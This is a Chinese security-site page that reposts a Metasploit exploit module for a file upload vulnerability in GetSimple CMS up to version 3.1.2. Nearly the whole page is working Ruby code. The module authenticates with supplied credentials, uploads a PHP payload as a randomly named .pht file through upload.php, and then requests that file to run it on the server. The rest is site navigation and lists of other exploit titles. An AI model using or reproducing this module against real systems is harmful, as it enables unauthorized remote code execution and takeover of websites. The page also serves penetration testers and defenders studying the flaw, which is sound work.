首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GetSimpleCMS PHP File Upload
来源:metasploit.com 作者:Mohamed 发布时间:2014-09-22  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetSimpleCMS PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a file upload vulnerability in GetSimple CMS. By abusing the
        upload.php file, a malicious authenticated user can upload an arbitrary file,
        including PHP code, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Ahmed Elhady Mohamed'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '25405'],
          ['OSVDB', '93034']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Generic (PHP Payload)', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 04 2014'
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']),
      OptString.new('USERNAME', [true, 'The username that will be used for authentication process']),
      OptString.new('PASSWORD', [true, 'The right password for the provided username'])
    ], self.class)
  end

  def send_request_auth
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path.to_s, "admin", "index.php"),
      'vars_post' => {
        'userid'    => "#{datastore['USERNAME']}",
        'pwd'       => "#{datastore['PASSWORD']}",
        'submitted' => 'Login'
      }
    })

    res
  end

  def send_request_upload(payload_name, cookie_http_header)
    data = Rex::MIME::Message.new
    data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
    data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")

    data_post = data.to_s

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path.to_s, "admin", "upload.php"),
      'vars_get' => { 'path' =>'' },
      'cookie'   => cookie_http_header,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data_post
    })

    res
  end

  def check
    res = send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, 'admin', 'index.php')})

    if res && res.code == 200 && res.body && res.body.to_s =~ /GetSimple CMS.*Version\s*([0-9\.]+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - Version #{version} found")

    if Gem::Version.new(version) <= Gem::Version.new('3.1.2')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Authenticating...")
    res = send_request_auth

    if res && res.code == 302
      print_status("#{peer} - The authentication process is done successfully!")
    else
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end

    print_status("#{peer} - Extracting Cookies Information...")
    cookie = res.get_cookies
    if cookie.blank?
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end

    print_status("#{peer} - Uploading payload...")
    payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht'
    res = send_request_upload(payload_name, cookie)

    if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</
      upload_path = $1
      print_good("#{peer} - File uploaded to #{upload_path}")
      register_file_for_cleanup(payload_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_raw({
      'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name),
      'method' => 'GET'
    }, 5)
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Seafile-server <= 3.1.5 - Remo
·Joomla Mac Gallery <= 1.5 Arbi
·Oracle MyOracle Filter Bypass
·Joomla Face Gallery 1.0 Multip
·seafile-server 3.1.5 Denial Of
·Fast Image Resizer 098 - Local
·ZTE ZXDSL-931VII Unauthenticat
·xcode-select 13.4.0 Buffer Ove
·Phpwiki Ploticus Remote Code E
·WS10 Data Server SCADA Exploit
·WordPress Slideshow Gallery 1.
·ZyXEL Prestig P-660HNU-T1 ISP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved